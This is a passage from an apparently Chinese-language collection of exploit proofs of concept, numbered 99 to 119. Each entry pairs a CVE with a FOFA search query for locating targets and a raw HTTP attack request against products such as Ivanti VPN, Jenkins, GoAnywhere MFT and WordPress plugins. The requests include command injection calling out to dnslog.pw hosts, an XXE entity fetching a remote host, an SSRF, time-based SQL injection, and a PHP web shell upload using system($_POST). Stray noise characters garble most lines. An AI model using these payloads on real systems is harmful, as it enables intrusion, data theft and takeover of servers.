J: B5 D" U# J7 nContent-Type: application/x-www-form-urlencoded; charset=UTF-8
2 @ x# ?9 n4 W3 c* e) pX-Requested-With: XMLHttpRequest- B4 J( u P) B/ s
) M ~6 Q% T/ D0 j9 i
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
* S* U/ X |! ~( a! X6 e5 R8 N/ q9 h o* I0 ?
6 R3 g) W* `6 w; ?# P! D
99. Ncast盈可视高清智能录播系统busiFacade RCE
/ r4 e/ l; D$ Y$ ^4 H1 b& YCVE-2024-03056 n$ @( d1 Y, s" V/ B, l* c
FOFA:app="Ncast-产品" && title=="高清智能录播系统"! K$ P+ L% n" U8 [0 v
POST /classes/common/busiFacade.php HTTP/1.1! n& G- O ] _5 w ?2 o
Host: 192.168.40.130:8080
# w7 v0 r2 Y% I0 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0) Y1 C$ X7 `: H+ Z6 n& A! M; o8 @5 @
Connection: close! F, h" ^7 W1 t
Content-Length: 1544 P1 X& s- f2 }* L7 O/ l
Accept: */*) ~. v e6 W6 J8 d5 |# x
Accept-Encoding: gzip, deflate
( s8 L/ n# ]# { uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 |: u6 G) x! }0 x
Content-Type: application/x-www-form-urlencoded; charset=UTF-8+ T3 q. t2 k) b
X-Requested-With: XMLHttpRequest# l. @3 m& c3 c
( r9 Y& v" n% W; T/ _# R8 y%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
3 I! |/ ^3 s/ }* P( e* o; c2 A
2 |. a; D" O1 K n$ i; d" F# T' @; Z1 i' i; {
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传7 v" m1 i- d- X8 `% j4 b/ g0 J9 p
CVE-2024-0352$ j8 @ e* O4 Q* e& N( e& K
FOFA:icon_hash="874152924"
* l0 {1 R! v/ c7 f2 C- hPOST /api/file/formimage HTTP/1.1! {: M+ C( ?$ S% ^7 ?' h0 u
Host: 192.168.40.130
( V3 l2 J# \3 b! Q6 H$ t' WUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
, a" z8 k; s$ ~& ]Connection: close
6 N \( j( F8 }( h4 jContent-Length: 201% j: X/ V$ s j$ K( R4 z5 {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
6 u3 Z: _" P# n6 t3 w. D. Y9 YAccept-Encoding: gzip0 N5 s0 o% b" G7 o0 o2 p0 z
. |4 B' g7 [, B5 O9 J2 j# o------WebKitFormBoundarygcflwtei! s \1 Y1 I! y. H
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
3 i; x- T" m* z6 c% ~8 l1 vContent-Type: application/x-php
3 Z# i# N- r5 \. i% V J
* B* |8 Z5 _ `8 d- A2ayyhRXiAsKXL8olvF5s4qqyI2O$ \" Q' v4 y H/ h" Y
------WebKitFormBoundarygcflwtei--- w6 [- k7 {8 s/ y! p
$ N" q8 F& A u6 ]# ~
1 n2 a2 Y; H7 x" A# n5 z101. ivanti policy secure-22.6命令注入
9 J% I4 }$ w" T( f) }CVE-2024-21887
& H. G4 r% i0 P3 m% I8 z" K- LFOFA:body="welcome.cgi?p=logo"
6 Q9 v* f' @' R- d# x8 aGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" |) i! [' _/ D' x2 ]
Host: x.x.x.xx.x.x.x
3 E# y n9 u k4 B/ J$ G/ q; q& VUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: L' C1 @+ t- n8 yConnection: close
9 Z8 Q. }, g0 z2 ]+ k4 D0 V( UAccept-Encoding: gzip P# |$ _; K) }5 V: s
8 d/ m, E1 L6 T1 C8 j
2 A& A2 G+ c: e8 k Q% K' t
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
- @! I, h- C$ [CVE-2024-21893
5 k3 M; n1 X+ ^' Z. H0 dFOFA:body="welcome.cgi?p=logo"
2 F% w. c( x( APOST /dana-ws/saml20.ws HTTP/1.1& Y6 |$ i0 l c- D8 X
Host: x.x.x.x
5 k% o) e0 B9 F+ r- }+ x, cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% O0 ]" b B. g& _" tConnection: close( Z+ z) `* r( G% \* }1 r8 b: f
Content-Length: 792
! g3 M3 y' t' Q& E- `, R0 T6 |/ QAccept-Encoding: gzip
/ F# `% q7 @# D( _! N
. J5 E( w7 w" }. A<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>( V7 S" H( F6 z' G& x2 s0 n
7 e. q8 S* ?9 k2 Z6 a9 C103. Ivanti Pulse Connect Secure VPN XXE
; B x2 x8 }, m) P& {; X; ICVE-2024-22024
/ t9 |( n8 n6 I) {! C" oFOFA:body="welcome.cgi?p=logo"
) g" B6 U' s* }. EPOST /dana-na/auth/saml-sso.cgi HTTP/1.1 P, M7 B0 |) ~
Host: 192.168.40.130:111) t% N1 g! P5 o: p" j; p
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.363 X$ c: `, v6 c" V& I6 J; W
Connection: close. G( W% j9 O3 S( ]
Content-Length: 204
- D, S- x8 ~6 t- ^: {! O" b+ XContent-Type: application/x-www-form-urlencoded! N& H6 N6 s+ d, u
Accept-Encoding: gzip: D: r- W3 s' L
- l7 E7 l( h$ J; d6 z9 MSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==7 F+ M' {1 P+ |
4 H# p2 ^2 Q4 K. U3 U4 `
* ~5 L: D) m; V& s" i* H其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
, a6 r6 c' k% v; f! j/ ?<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
$ I" M, a2 S7 L5 s
: y2 P: e4 e3 ?
0 o4 G7 r" F& t7 t$ n104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露" Z" Y! } n; l0 G- s! F" X
CVE-2024-0569: g/ o, @" y5 h4 d7 W' q
FOFA:title="TOTOLINK"0 d0 h; z) e% H# X. N1 h; g9 A1 v* N
POST /cgi-bin/cstecgi.cgi HTTP/1.1
* H( z+ n* ]/ N; S5 rHost:192.168.0.1: g F5 a# o0 c! k3 J+ D% j. Z
Content-Length:41
% Q+ d9 Q$ L2 s+ [Accept:application/json,text/javascript,*/*;q=0.01
: m3 R7 ~3 ^% k, i# E3 a, m) wX-Requested-with: XMLHttpRequest* N/ y0 p3 X d, A9 `1 o' X
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.360 m! W* R) L \! i- C& J$ Z0 U" c
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
' W; t- X2 F8 v! T% m- F* a2 N7 {4 GOrigin: http://192.168.0.1
) E) U5 ~, x( O# T' CReferer: http://192.168.0.1/advance/index.html?time=1671152380564
: o/ i; m" f% a$ n; `" MAccept-Encoding:gzip,deflate u9 l/ b5 E% e1 _
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
! [0 n+ T$ Y% D$ P# ^# |9 i7 JConnection:close
9 {" U$ Z% m: F! I
/ f3 P! n# j( t; C; H3 B{$ b& w' i- B( V
"topicurl":"getSysStatusCfg",
* K8 l# X: y8 A"token":""
4 ^' | P( `- G- w: r# P( g& F}2 H% _" o$ X' d: O3 ?3 o
3 W% m* a# j, H4 j3 @, ~7 q+ S: Z$ r7 y$ B9 ]105. SpringBlade v3.2.0 export-user SQL 注入
$ S* A7 ^: u' y. N* ^+ o3 tFOFA:body="https://bladex.vip"
# z( f& b% c: Y. ~' t; mhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1& K8 H' c* |; A, o$ e
( d# N) Y" L0 [0 d0 n. H" z
106. SpringBlade dict-biz/list SQL 注入
$ B3 Z- j1 x+ v( z! N1 EFOFA:body="Saber 将不能正常工作"" b. l k3 B! h3 w% `
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
% z. C- B6 K8 e" H w; dHost: your-ip
4 P# I; c- s" v0 s- \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 V: r( F4 u2 l$ |9 c" N# Y. K
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A$ F3 l2 N2 D- B- r# `: _! H
Accept-Encoding: gzip, deflate4 [* B* z! {: }+ y5 v: | u
Accept-Language: zh-CN,zh;q=0.9
; [$ ~5 c9 i" P' aConnection: close
+ d! O& L I4 v% h+ |6 ~ r, `+ h; M' E4 ~
1 l. b; O( k, u3 z- e1 m107. SpringBlade tenant/list SQL 注入/ {- ]! M6 [1 V( ?3 p( j% G
FOFA:body="https://bladex.vip"
( p9 B9 `6 B9 {" c' Y9 b6 _+ TGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
& S/ K, H$ ]- ]9 A2 _Host: your-ip
* |& i" i0 q9 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! G5 @+ z# i+ kBlade-Auth:替换为自己的
. L2 u. T7 G* {8 P/ c/ N8 G/ s' HConnection: close. [6 [6 r; ^ z
! M0 B* S0 R( q F& I$ F @7 ~# L5 C9 Z2 x* d! o5 y8 E7 ^
108. D-Tale 3.9.0 SSRF
( c2 j$ d* @5 p6 @1 q4 j& bCVE-2024-21642" f. [% Q+ l: f; l' z
FOFA:"dtale/static/images/favicon.png"; B& P: x: T+ O5 N2 @4 T% r, l
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
5 w$ T: q6 w! b/ u" qHost: your-ip Y& r4 j3 ]+ C' d0 G& m
Accept: application/json, text/plain, */*
! b/ r5 y* ]! Y# AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' M# d4 v! q. [/ v0 U
Accept-Encoding: gzip, deflate
! i- H( c* d( Y1 [+ J' v8 C+ GAccept-Language: zh-CN,zh;q=0.9,en;q=0.8$ S* h8 }! U4 |8 O: b
Connection: close. C+ R2 W. I& R4 S
: k v- S8 }- O
4 E3 ^. L$ X. t$ V$ Q109. Jenkins CLI 任意文件读取" `3 ]5 ]* a8 ]# g+ @+ I7 X
CVE-2024-23897
1 o# R+ e0 l# F- {2 y& i$ lFOFA:header="X-Jenkins"' ?" u* D1 C# k4 e% W
POST /cli?remoting=false HTTP/1.1
, @& v E- y. ?Host:
$ T+ L$ e2 q4 z# ]Content-type: application/octet-stream- H+ w$ ~/ c% X- q' L* t7 i
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
" Y4 _! R# o) o) q1 I; C9 QSide: upload4 C" H- x D ~3 Y" W
Connection: keep-alive( W, E5 Q: X- W* A# A3 K% q
Content-Length: 163
- W" Z: [# r: b; F+ g. F2 z6 ^6 d8 |2 x: P
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'0 ?$ f! Q% o& V1 T7 [2 n
: R( h& ?- G. B% P. y2 M4 z! K
/ F: P* r2 m) I) E) ]5 I+ HPOST /cli?remoting=false HTTP/1.1
D/ V% q/ x7 i5 d$ A. f2 hHost:! t' A6 m" s" ]# `4 Z9 E
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
% r! H) ~1 k: L2 Y' I+ Y8 f! |4 odownload3 F6 p" V. a7 h q
Content-Type: application/x-www-form-urlencoded
+ n2 a: L3 G+ o! NContent-Length: 0
\4 ]) ]; [- K2 C/ {4 \/ r8 \2 h: V
' v6 m- `% }* ^! v. d
0 |) |$ Z' h3 X- s3 d, NERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin7 n9 v$ S; S: Q5 u; Q1 K) r6 q0 x" z
java -jar jenkins-cli.jar help% X: b7 ?2 E. I2 L+ e' ?3 Y6 u1 m8 M" t
[COMMAND]
/ O, i2 w, s. B) A! E" W( e7 ZLists all the available commands or a detailed description of single command.
' q- v: h! e! m) y COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)7 a: n) t# \; f0 J. P$ S3 u
5 S3 N7 I6 p& s
- X" a: m* ]$ ~9 ]4 Z9 ~
110. Goanywhere MFT 未授权创建管理员
* y h- L4 [3 ^4 D7 j" |2 e4 j, `& b* SCVE-2024-0204( q* u# s& r; D! S6 u
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
1 f0 N# j" e" W: `! FGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1) O* c" x0 I/ `6 {2 q; D/ y6 t
Host: 192.168.40.130:8000/ z1 ]- I: |* Z5 Q1 K$ N
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36* B3 g# v8 @! C; M
Connection: close ` R, ^, W( x* x! T1 L1 D
Accept: */*
0 \) o) o3 R1 q1 k: }: M9 v' c: fAccept-Language: en" {. u2 K% w% M( K! f: h! G. ]
Accept-Encoding: gzip
, h y$ l& ?, \# J
* N7 y+ G- B! o& t. C2 |/ m; v; P" M1 u& Z& T
111. WordPress Plugin HTML5 Video Player SQL注入
) W# q( C. H' o1 ^+ wCVE-2024-1061
* c1 f. _! V6 {4 ^, M' BFOFA:"wordpress" && body="html5-video-player"4 x' M. L$ P, V9 b% I/ Y. F) S
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1: S n! r, X: P& X+ L$ y
Host: 192.168.40.130:112
. T( P$ e! S* o- {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
1 k4 F! e& Q8 \( |# pConnection: close) a8 b* Q2 Z" H. x" F* s
Accept: */*
, `2 v/ {7 [# Y2 }0 r! c' IAccept-Language: en
, B; l6 b5 c. K' U# k# }% y4 J oAccept-Encoding: gzip8 l" }' [1 |4 k0 b) M+ f ~2 B L
9 B& K9 g& B/ @$ a/ I t
t4 P& F' X: d
112. WordPress Plugin NotificationX SQL 注入
$ e7 P6 Y" }) Y0 f0 BCVE-2024-16980 q7 {/ E' y% V/ M
FOFA:body="/wp-content/plugins/notificationx"1 P" B( A1 ^! s. k. H3 X2 |, L$ s
POST /wp-json/notificationx/v1/analytics HTTP/1.1
6 b7 |6 g( {- [; w2 T' PHost: {{Hostname}}
( E- U* N) w+ t7 ]6 [Content-Type: application/json* [5 V$ d2 q! T9 ^9 T% p* d2 z4 a G
5 L$ I9 f" T. D: E" d1 G{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
z0 d2 k! Z" w' Q* f7 Q
# {) l& w) I0 Q+ {
6 v, f/ ~& B( \5 J/ g1 z* @113. WordPress Automatic 插件任意文件下载和SSRF/ w9 F- |$ M$ i4 O( x$ e
CVE-2024-27954/ S2 I# y+ u' H
FOFA:"/wp-content/plugins/wp-automatic"- y6 T) q- ]# B
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
6 S0 I3 c$ K; ]0 kHost: x.x.x.x9 k5 @' m8 K6 c0 K7 L
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36% \8 M/ M6 B2 f1 }) T: P$ a
Connection: close
. }1 h; Q, h& m' r; d7 MAccept: */*
1 ?1 w" M1 _* I" T; FAccept-Language: en/ D3 K2 z; B' T9 E7 X# b
Accept-Encoding: gzip
* b) C; n+ F- ~4 x+ c6 U' f9 D; @
+ O3 ^6 P w ~$ y114. WordPress MasterStudy LMS插件 SQL注入 b$ s* c# }2 A; B
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/") u) [& T, X8 z7 _
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.17 @2 w) ^% p; j. {! i( K; `" e8 {. y
Host: your-ip+ D) S: g; S! m9 b V( I2 ]
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 |1 |: T4 s+ @' k5 CAccept-Charset: utf-89 H4 T/ e" x5 K8 ^8 w1 F
Accept-Encoding: gzip, deflate
) ]3 x, B. v1 t) ^1 HConnection: close* |6 U" d- c) {3 V0 g
0 J2 U! ^! s2 J0 n3 W
m/ H; g) a- Z- H$ v$ \- A& q+ `: k115. WordPress Bricks Builder <= 1.9.6 RCE
( X/ q9 u* W3 K9 d% i: R+ BCVE-2024-256001 s& v3 ^3 w& P
FOFA: body="/wp-content/themes/bricks/"" Y7 Z" `8 l% x' j s; @2 a
第一步,获取网站的nonce值( o% u' l$ j- t4 a
GET / HTTP/1.1
$ \' F0 n# M1 Z8 D# \Host: x.x.x.x
% F8 j" |9 w0 D! J- qUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 I% |# W; u( W0 E# l4 R/ m
Connection: close8 e4 b" Y, o* @# T# ~- d
Accept-Encoding: gzip
( u E0 ]0 p" B2 {. N5 t4 {4 {2 m2 \. I8 ]
) |7 ?, I2 ^( }/ @' N, _+ w v
第二步替换nonce值,执行命令
3 p. G, @/ ]( Q0 ?POST /wp-json/bricks/v1/render_element HTTP/1.1
0 e( `6 t, v- N% ^Host: x.x.x.x+ K- P ^/ B Y1 x: d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 m1 S6 E6 t6 ?3 r' Y. w9 N0 h+ S- ^9 F
Connection: close1 s5 z! i0 l$ `0 v. P# ^' x( b
Content-Length: 356
- H! g+ Q* H+ k4 p) z0 |- v) k! uContent-Type: application/json' R. O& T( Q" Y
Accept-Encoding: gzip
4 W- o+ B F5 Y6 P0 n+ t+ Q# o. c, b% z
{
% i! y, y" W1 j8 f" T"postId": "1",1 O: }/ L" o3 |9 K" r$ e
"nonce": "第一步获得的值",
. ^( A% w g7 s; |4 y% Y "element": {
8 u: E' U6 y6 h% d4 v/ ~6 L } "name": "container",8 v, D9 _' L3 }; ^" I) t
"settings": {
9 b3 {4 e& U1 z/ [ "hasLoop": "true",
& ~3 w" I U; T' J' @$ E. I "query": {
( N% ~8 s! u/ J0 A; l. A) x "useQueryEditor": true,
( s. F: j6 A3 X, w: X" Y4 e- f9 x% _6 V; B "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",& g- I. N: r! j
"objectType": "post"
5 x7 ?0 s: S9 y& m3 q }# L2 u4 ]8 a$ o
}3 _# x7 B( S- G/ ~+ ^! |1 p# J' l) f
}
/ q: K* K U$ e9 j+ U. U% Y1 T' _}
) Y1 t0 w. \/ r! [. R8 t2 R( ^3 J' d6 t' g ^$ Q
+ H. O8 e* D1 y; e2 P116. wordpress js-support-ticket文件上传
" g& |' ~. l% h' O- TFOFA:body="wp-content/plugins/js-support-ticket"
5 N# C8 ?0 g% G/ c% m4 e+ f% a# DPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
T3 b% c! o* I+ vHost:3 t; ~) D* Q0 S
Content-Type: multipart/form-data; boundary=--------767099171
. Z7 ], l0 o, O$ |- z- O5 i( wUser-Agent: Mozilla/5.0
5 @* `! R7 C U% _! G+ ^" Z7 W" |5 ^9 X
----------7670991713 O! m1 z+ _5 ?! J$ S& }) ?4 G
Content-Disposition: form-data; name="action"$ Q! ?9 O% D4 J8 R0 e7 D2 |9 T
configuration_saveconfiguration) C2 F6 E5 _9 @8 A
----------767099171
( p7 ?( O; W! {2 w3 q$ wContent-Disposition: form-data; name="form_request"0 y; t Y# ? E1 _3 x; }& x
jssupportticket
6 r/ V3 [( r, |3 n% p8 o. e----------767099171
. `' d. N! O' ~; \9 r4 ]2 ~( zContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"/ ?/ h9 g, {5 n) j+ {1 G1 e- `, B; p p
Content-Type: image/png
3 w) l/ ?7 s; _9 ?( k----------767099171--
7 |2 j: k8 ^' ?. U( _. {0 w& W( a* a/ |' n5 L1 }' ~4 S
$ \5 G, r9 `9 P+ ?2 M6 S F
117. WordPress LayerSlider插件SQL注入
% U+ ?) O/ U. }version:7.9.11 – 7.10.0
& P, E7 R2 V) Z) \8 l% Y- UFOFA:body="/wp-content/plugins/LayerSlider/") p' a$ J/ T; z+ n- R1 D
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1+ J+ D) m7 @6 Z! \5 Q
Host: your-ip
- \, ]- [" C+ J8 U" mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
, Q2 t- f1 `7 t9 b2 V3 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 _; a K* A5 B- |$ ~: M5 f. I, jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 E9 k7 N9 b; o: J' g* Z& R! \
Accept-Encoding: gzip, deflate, br8 a5 b' j6 A- Y2 R* k* j# b
Connection: close' `. W! C3 p- [
Upgrade-Insecure-Requests: 1
, D+ {- l' V: Y" x0 t9 z5 ?9 W9 J4 q! L, T9 m
2 F* ~4 S" c4 x
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
/ u1 U7 w* i6 ]CVE-2024-0939
5 r( d0 Y2 I9 m5 @ gFOFA:title="Smart管理平台"# J- Y% C4 d1 H/ ], ~; u& p8 V
POST /Tool/uploadfile.php? HTTP/1.1, X( D% v9 D/ W
Host: 192.168.40.130:84435 T* h& c- o3 S
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8* W1 ^- ?9 F( p5 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
8 [9 W8 R1 u+ xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 j. J% s8 c0 Y+ V4 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 y; E" O- j" J; L9 D4 eAccept-Encoding: gzip, deflate
1 {$ J9 C; \& v' M, @Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
3 v, V4 B& F" M, LContent-Length: 4050 {3 |$ Q6 G* q- W4 b7 I. u
Origin: https://192.168.40.130:8443. D$ F5 ?& K9 N1 Y) y8 Z$ M6 v3 S
Referer: https://192.168.40.130:8443/Tool/uploadfile.php! q" ^0 Q% H0 X. \
Upgrade-Insecure-Requests: 1
1 Q W0 ^ R! B/ r, USec-Fetch-Dest: document& U# T! H. r" n6 k) E3 ?; G# {
Sec-Fetch-Mode: navigate
/ `3 I3 b+ g+ ~# S9 sSec-Fetch-Site: same-origin
" A! J4 B* h3 S4 ISec-Fetch-User: ?1
4 l/ h ^9 g: i9 \$ s7 f9 oTe: trailers
+ r+ B6 A/ ` ?" _$ s9 F3 i4 h1 Q7 cConnection: close3 ?3 ]1 ^9 F4 i% U5 I. W2 D. a
# {1 V: n( a) ^+ L( C* h7 c9 m+ N
-----------------------------139797012227476466340371828873 {* r7 `' J0 t: F
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
' w, [+ K p6 \: ` F* ~1 z+ EContent-Type: application/octet-stream
- x# u( o1 L( p' v4 v' d. ^* K$ P. l0 ?5 h. E
<?php
) D' @5 i4 [: C7 y; v' Z5 D1 W! ?system($_POST["passwd"]);# R* A4 e- |" ]' j# J9 o2 q
?>3 C% {4 a5 S' y3 a9 |8 }
-----------------------------139797012227476466340371828873 S4 a6 b6 W( ^ ]9 T
Content-Disposition: form-data; name="txt_path"
5 i1 r H4 T/ d+ D3 Q2 Z4 _( n, J
/home/src.php, C$ |6 e/ `. O2 w' B* |3 I
-----------------------------13979701222747646634037182887--2 S' O% O" D1 D' q
6 b# a# V) M4 u& A: T- i
z; F0 D; {5 x" d9 w. ?; D3 l) k访问/home/src.php
7 T7 N3 @" M4 B! b" Z+ _; W
( U4 M8 s3 j0 y; ]) \0 s119. 北京百绰智能S20后台sysmanageajax.php sql注入) C: }: V7 Q. H* Y2 E$ C. j3 [
CVE-2024-1254) s$ q' [' o/ R8 c& a3 F$ y
FOFA:title="Smart管理平台"
+ [! L9 w/ r+ R- z; D: X先登录进入系统,默认账号密码为admin/admin: d9 g6 a5 V; r: c) L
POST /sysmanage/sysmanageajax.php HTTP/1.11
0 z* \+ ~. ?) e, HHost: x.x.x.x& y" {3 f& k5 b: f5 W0 V
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee4 ?6 }1 q! h) m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
+ |- K& \8 u* o1 IAccept: */* ^, d. x) k$ V( r* L. T9 m3 B% z- d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* i9 F$ G5 Y9 z4 ?. D3 D) W HAccept-Encoding: gzip, deflate) \( T8 Z% Y0 q
Content-Type: application/x-www-form-urlencoded;, \1 t: V& D9 E4 n" C
Content-Length: 109
* z7 B+ K5 ^/ s( g- t6 d, iOrigin: https://58.18.133.60:8443
8 L4 Q3 M9 Z5 ?+ W/ {3 p, K! sReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
7 C/ r+ o, H. C+ q" WSec-Fetch-Dest: empty
/ n; z5 E: A/ a+ [/ wSec-Fetch-Mode: cors
6 }4 S& j8 _$ z# U) ASec-Fetch-Site: same-origin
1 Z/ X9 E/ w% tX-Forwarded-For: 1.1.1.1
! e% c9 S- d* y1 k9 s5 _6 _4 M% {X-Originating-Ip: 1.1.1.1* i' c4 L3 q* I
X-Remote-Ip: 1.1.1.1
